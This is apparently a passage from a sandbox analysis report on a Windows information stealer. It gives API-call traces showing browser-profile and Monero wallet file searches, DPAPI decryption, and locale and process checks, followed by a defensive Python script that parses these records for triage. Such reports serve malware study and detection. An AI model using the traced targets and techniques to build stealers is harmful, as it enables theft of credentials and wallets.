                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 4ce20eb790db5cac9cf98f9f947b1fda22836072bec71bca7af50b85d4018359
                              • Instruction ID: d34a4d7dab3b2975787c204f69b493deea7507ba852b315a469b3c64141b9a03
                              • Opcode Fuzzy Hash: 4ce20eb790db5cac9cf98f9f947b1fda22836072bec71bca7af50b85d4018359
                              • Instruction Fuzzy Hash: 1FB1A5759001089BCB64FF61DC56FEE7379AF54308F0081AEA40E96151EF389B59CFAA
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D510C,?,?,?,004D51B4,?,?,00000000,?,00000000), ref: 004B1923
                              • StrCmpCA.SHLWAPI(?,004D525C), ref: 004B1973
                              • StrCmpCA.SHLWAPI(?,004D5304), ref: 004B1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004B1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 004B1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004B1E20
                              • FindClose.KERNEL32(000000FF), ref: 004B1E32
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 1000e35da70bb787435d0af9c0f669fa655784c868dfaaa20b3e9349381c087c
                              • Instruction ID: 9e6909f2dafbbcc5c01a0684521dc48e134e91f40ec31f868d857de736383374
                              • Opcode Fuzzy Hash: 1000e35da70bb787435d0af9c0f669fa655784c868dfaaa20b3e9349381c087c
                              • Instruction Fuzzy Hash: 72121E7591011C9BCB55FB61DCA6FEE7338AF14308F40459EA10A62091EF386F99CBB9
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004D0C2E), ref: 004BDE5E
                              • StrCmpCA.SHLWAPI(?,004D14C8), ref: 004BDEAE
                              • StrCmpCA.SHLWAPI(?,004D14CC), ref: 004BDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BE3E0
                              • FindClose.KERNEL32(000000FF), ref: 004BE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 72292792ad932214760f1f57b755d2529d7b46ca0e6ee465384f3d1384ff7c5d
                              • Instruction ID: ec04c88f05f59349d0a0ac9f14cbb6034551f2264c5e439e1ab7e04d2f9bde00
                              • Opcode Fuzzy Hash: 72292792ad932214760f1f57b755d2529d7b46ca0e6ee465384f3d1384ff7c5d
                              • Instruction Fuzzy Hash: D5F1BC7581011C9BCB65FB61DC96FEE7338AF14308F5041AFA40A62091EE386F5ACE79
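                              The records above all share one shape: FindFirstFileA, a pair of StrCmpCA calls, a FindNextFileA loop and FindClose, with only the format string (%s\%s, %s\*, \*.*) and the target string (\Brave\Preferences, prefs.js, the \Monero\wallet.keys argument seen on the shared lstrlen helper at 004CA9B0) changing from one routine to the next; the routine at 004B1923 additionally calls CopyFileA and DeleteFileA. Turning that dump into a triage table is easier in code than by eye. The Python below is an added example written for this page, not Joe Sandbox output and not code from the sample: it parses records in the format shown here and tags each routine by what it enumerates. The record grammar is inferred from the lines above; the TARGET_MARKERS list, and the assumption that a pair of StrCmpCA calls is the '.' / '..' skip (the literals at 004D13F8 and similar are not printed in the dump), are the author's own; the three-record SAMPLE is a trimmed excerpt of the records above, used as constructed test input.

```python
"""Triage Joe Sandbox function records ('APIs' / 'Similarity' blocks) into a
table of file-enumeration routines and the paths they build or look for.
Added example, not part of the report. The record grammar is inferred from the
lines on this page; TARGET_MARKERS and the '.'/'..' heuristic are assumptions."""
import re

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
STRINGS_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<val>.*)$")
ENUM_APIS = {"FindFirstFileA", "FindNextFileA", "FindClose"}
TARGET_MARKERS = ("Preferences", "prefs.js", "wallet.keys")  # assumed, from the String IDs shown


def parse_records(text):
    """Return one dict per 'APIs' block: direct calls, callee calls, referenced strings."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":  # every record opens with this header
            cur = {"calls": [], "subcalls": [], "strings": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            call = {"name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": [a for a in (m["args"] or "").split(",") if a]}
            # 'Part of subcall function' lines belong to a callee, not to this routine.
            (cur["subcalls"] if m["sub"] else cur["calls"]).append(call)
            continue
        s = STRINGS_RE.match(line)
        if s:  # '$' separates the strings the routine references
            cur["strings"] = [x for x in s["val"].split("$") if x]
    return records


def classify(rec):
    names = {c["name"] for c in rec["calls"]}
    tags = []
    if ENUM_APIS <= names:
        tags.append("dir_enum")
        # Heuristic: two StrCmpCA calls between FindFirstFileA and FindNextFileA
        # is the usual '.' / '..' skip; the literals compared are not in the dump.
        if sum(c["name"] == "StrCmpCA" for c in rec["calls"]) >= 2:
            tags.append("skips_dot_entries")
    if {"CopyFileA", "DeleteFileA"} <= names:
        tags.append("copy_then_delete")  # harvest a file, then remove the copy
    return {
        # Lowest direct call site approximates where the routine's body starts.
        "entry": min((c["ref"] for c in rec["calls"]), default=None),
        "tags": tags,
        "patterns": [s for s in rec["strings"] if "%s" in s or "*" in s],
        "targets": [s for s in rec["strings"] if any(k in s for k in TARGET_MARKERS)],
        # Argument snapshots on subcall lines come from whichever caller the sandbox
        # saw, so they are hints about the helper, not proof of this routine's target.
        "arg_hints": sorted({a for c in rec["calls"] + rec["subcalls"] for a in c["args"]
                             if any(k in a for k in TARGET_MARKERS)}),
    }


def triage(text):
    return [classify(r) for r in parse_records(text)]


# Constructed test input: three records excerpted from the report above.
SAMPLE = r"""
APIs
  • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
• FindFirstFileA.KERNEL32(00000000,?,004D0B32,004D0B2B,00000000,?,?,?,004D13F4,004D0B2A), ref: 004BBEF5
• StrCmpCA.SHLWAPI(?,004D13F8), ref: 004BBF4D
• StrCmpCA.SHLWAPI(?,004D13FC), ref: 004BBF63
• FindNextFileA.KERNEL32(000000FF,?), ref: 004BC7BF
• FindClose.KERNEL32(000000FF), ref: 004BC7D1
• String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
APIs
• wsprintfA.USER32 ref: 004C492C
• FindFirstFileA.KERNEL32(?,?), ref: 004C4943
• StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
• StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
• FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
• FindClose.KERNEL32(000000FF), ref: 004C4B92
• String ID: %s\%s$%s\%s$%s\*
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D510C,?,?,?,004D51B4,?,?,00000000,?,00000000), ref: 004B1923
• StrCmpCA.SHLWAPI(?,004D525C), ref: 004B1973
• StrCmpCA.SHLWAPI(?,004D5304), ref: 004B1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004B1D40
• DeleteFileA.KERNEL32(00000000), ref: 004B1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 004B1E20
• FindClose.KERNEL32(000000FF), ref: 004B1E32
• String ID: \*.*
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["entry"], ",".join(row["tags"]), row["patterns"], row["targets"], row["arg_hints"])
```

                              Run it as a script to print one line per routine, or pass the whole function-analysis section of the report to triage() to cover every record. Argument snapshots on 'Part of subcall function' lines are captured from whatever caller the sandbox happened to observe, so \Monero\wallet.keys showing up under the Brave routine means the shared helper at 004CA9B0 handled that path somewhere in the run, not that this particular routine targets it; the code therefore reports such values as arg_hints rather than as targets.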
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D14B0,004D0C2A), ref: 004BDAEB
                              • StrCmpCA.SHLWAPI(?,004D14B4), ref: 004BDB33
                              • StrCmpCA.SHLWAPI(?,004D14B8), ref: 004BDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BDDCC
                              • FindClose.KERNEL32(000000FF), ref: 004BDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a0c70e5d706dec39baeeb5de7228e6b704b2ac6850c620324e60a372358b6d47
                              • Instruction ID: c6dee0537b31aa694540e7f37f3bcbcfcf7e4d183cc6536608e97414b0df1745
                              • Opcode Fuzzy Hash: a0c70e5d706dec39baeeb5de7228e6b704b2ac6850c620324e60a372358b6d47
                              • Instruction Fuzzy Hash: 5191487690010867CB54FBB1DC56EFD737DAB84308F40856EF80A96151EE389B19CBB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7%w$AX?5$Rw_$XJY#$g~$yL;W$\p$qz
                              • API String ID: 0-3148951601
                              • Opcode ID: 2e2d9d3daab81b37f1548a859a0ddecec8eb006ba4474ae9d83f3b5fbfab4b8c
                              • Instruction ID: 18468d4fae503cd649ceb9e265ff49597da48d153f222b48eeaaaa1544c26e14
                              • Opcode Fuzzy Hash: 2e2d9d3daab81b37f1548a859a0ddecec8eb006ba4474ae9d83f3b5fbfab4b8c
                              • Instruction Fuzzy Hash: 87B24BF3A082049FE7046E2DEC8567AB7EAEFD4320F1A863DE6C4C7744E93558018696
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004D05AF), ref: 004C7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004C7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004C7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004C7C62
                              • LocalFree.KERNEL32(00000000), ref: 004C7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ba928fe9a4c6ae522495139e508be80820af5644d3f6f2ed45fb73749b54f3ab
                              • Instruction ID: 69d891f36c7d67e4810c550f482a6a0760dffc23ec41eee0d4d228ffb6247853
                              • Opcode Fuzzy Hash: ba928fe9a4c6ae522495139e508be80820af5644d3f6f2ed45fb73749b54f3ab
                              • Instruction Fuzzy Hash: 46414C7590021CABCB64DB95DC99FEEB374FB44704F20419EE40A62280DB782F85CFA5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: __$?Cf$Ep?$OLQ$]BJK$bVX$z
                              • API String ID: 0-3238819472
                              • Opcode ID: b55135db650a3323688c6a3ec699eedd81620ff78cb49739c533acc45702d8d6
                              • Instruction ID: 53ea40e525d8e58fb681414e59dc90ac6050d848ea9009dca46849d22e53d771
                              • Opcode Fuzzy Hash: b55135db650a3323688c6a3ec699eedd81620ff78cb49739c533acc45702d8d6
                              • Instruction Fuzzy Hash: FAB229F3A0C2049FE3046E2DEC8567ABBE9EFD4720F1A853DEAC4C7744E93558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >5{$37/w$\[wj$d&?$h#q_$vJo[$vJo[
                              • API String ID: 0-2007659027
                              • Opcode ID: 399585b40bfd27ef25ae43e09777b3854cd8117ca875c3e107005bfc25caff17
                              • Instruction ID: 86f0844655009e2cc3fbaded378003889df824de9241405c6dcb336a0afb05fd
                              • Opcode Fuzzy Hash: 399585b40bfd27ef25ae43e09777b3854cd8117ca875c3e107005bfc25caff17
                              • Instruction Fuzzy Hash: 81B2E5F390C214AFE7046E2DEC4577ABBE9EF94760F1A493DEAC4C3744E63558008696
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004D0D73), ref: 004BE4A2
                              • StrCmpCA.SHLWAPI(?,004D14F8), ref: 004BE4F2
                              • StrCmpCA.SHLWAPI(?,004D14FC), ref: 004BE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 27d85a8cf7c21b71b9cd5e6c1c9d9b087ab7732f54d848936841c9ded83de7de
                              • Instruction ID: cf4513a0aa1d7068fcb1ec2fcb60005244b175f2063ecee5e0c0e6d2c070766f
                              • Opcode Fuzzy Hash: 27d85a8cf7c21b71b9cd5e6c1c9d9b087ab7732f54d848936841c9ded83de7de
                              • Instruction Fuzzy Hash: 0912707590010C9BCB54FB61DCA6FED7338AF5430CF4045AEA50A92191EE386F59CBBA
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                              • LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: NK
                              • API String ID: 4291131564-1808100879
                              • Opcode ID: e417d190d2044a775c7be08bec3e11daa2be6ba4502b5f34dd863c1ae4d0aae7
                              • Instruction ID: 4fd29ca9ca871600bda1da59de06fcadf62647d337cf2cb8f7de5cf573cf47b0
                              • Opcode Fuzzy Hash: e417d190d2044a775c7be08bec3e11daa2be6ba4502b5f34dd863c1ae4d0aae7
                              • Instruction Fuzzy Hash: 8311A4B4240308AFEB10CFA4DC95FAA77B5FB89700F208059FA199B390C7B5A901CB54
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *Qu/$,jo$pr?$-w{$?ww
                              • API String ID: 0-3577636421
                              • Opcode ID: 69c16cc5d23ddcc84ce4f17da7304651a22becffe108200f7c46a8e308beb346
                              • Instruction ID: c29747febfec9dafe1f37f98d6d2e88f7826a9edd6daf9a9309440c93f9843e7
                              • Opcode Fuzzy Hash: 69c16cc5d23ddcc84ce4f17da7304651a22becffe108200f7c46a8e308beb346
                              • Instruction Fuzzy Hash: B0B205F360C6049FE304AE2DEC8567ABBE5EF94320F1A493DEAC5C3744EA3558058697
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004BC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004BC87C
                              • lstrcat.KERNEL32(?,004D0B46), ref: 004BC943
                              • lstrcat.KERNEL32(?,004D0B47), ref: 004BC957
                              • lstrcat.KERNEL32(?,004D0B4E), ref: 004BC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ac7013070527d07f1a03052b7e975f36bebe0ad2f870ee083b715d38c67e810b
                              • Instruction ID: 5bdbe27fa139fc7eade596a4142e311038a4262474cdd433a9a06e9b897b692f
                              • Opcode Fuzzy Hash: ac7013070527d07f1a03052b7e975f36bebe0ad2f870ee083b715d38c67e810b
                              • Instruction Fuzzy Hash: 5E4171B5904219DBDB10DF94DD89BFEB7B8BB48304F1041A9E509A7280D7745A84CFA6
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 004C696C
                              • sscanf.NTDLL ref: 004C6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004C69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004C69C0
                              • ExitProcess.KERNEL32 ref: 004C69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 4491fd477070aa472b0ac0de3f5c568ed544572a638c718c289284ef9651f5da
                              • Instruction ID: f173bcd1f37497ab62290e569c37f78a4dd8a01b7460d8282e127b78b10ab8ec
                              • Opcode Fuzzy Hash: 4491fd477070aa472b0ac0de3f5c568ed544572a638c718c289284ef9651f5da
                              • Instruction Fuzzy Hash: 7C21CBB5D14208ABCF44EFE4D945EEEB7B6BF48304F04852EE41AE3250EB745605CBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004B724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004B7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004B72A4
                              • LocalFree.KERNEL32(?), ref: 004B72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 08504c738c7814362082931d39f4f57d726911218f86e8b65b435504ee559365
                              • Instruction ID: 0394fa5220c87c59bdf05ac06ea89071a5ebef9a37060b535f683081868e2953
                              • Opcode Fuzzy Hash: 08504c738c7814362082931d39f4f57d726911218f86e8b65b435504ee559365
                              • Instruction Fuzzy Hash: 9B0112B5A40208BBDB14DFE4CD45FAE7779EB44704F104155FB19AB2C0D6B4AA01CB69
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004C961E
                              • Process32First.KERNEL32(004D0ACA,00000128), ref: 004C9632
                              • Process32Next.KERNEL32(004D0ACA,00000128), ref: 004C9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004C965C
                              • CloseHandle.KERNEL32(004D0ACA), ref: 004C967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 2a2d44736582c773b186e958c735937891d003cf1936ee3fd96a94f92b0c3b9e
                              • Instruction ID: 83f0a26d5492985781e6103db29c2e60131fc866ae8ff611767ffda588584e50
                              • Opcode Fuzzy Hash: 2a2d44736582c773b186e958c735937891d003cf1936ee3fd96a94f92b0c3b9e
                              • Instruction Fuzzy Hash: 4B01E9B9A00208BBCB54DFA5CD48FEEB7F9AB48740F104189A90996280D774AE41CF55
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: q^Na$~$y$#8>$rt
                              • API String ID: 0-1945803552
                              • Opcode ID: d4e5b492466f3c5920dab80ecc61e9fa004a5934f9b77e620d9c815d82afe514
                              • Instruction ID: 777974bce8497046e89b27b845bcb6eea62edfe087af18c354b6a3ba05073fda
                              • Opcode Fuzzy Hash: d4e5b492466f3c5920dab80ecc61e9fa004a5934f9b77e620d9c815d82afe514
                              • Instruction Fuzzy Hash: 63B21BF360C2049FE304AE2DEC8567ABBE6EBD4720F16893DEAC4C7744E63558058696
                              Strings
                              Memory Dump Source
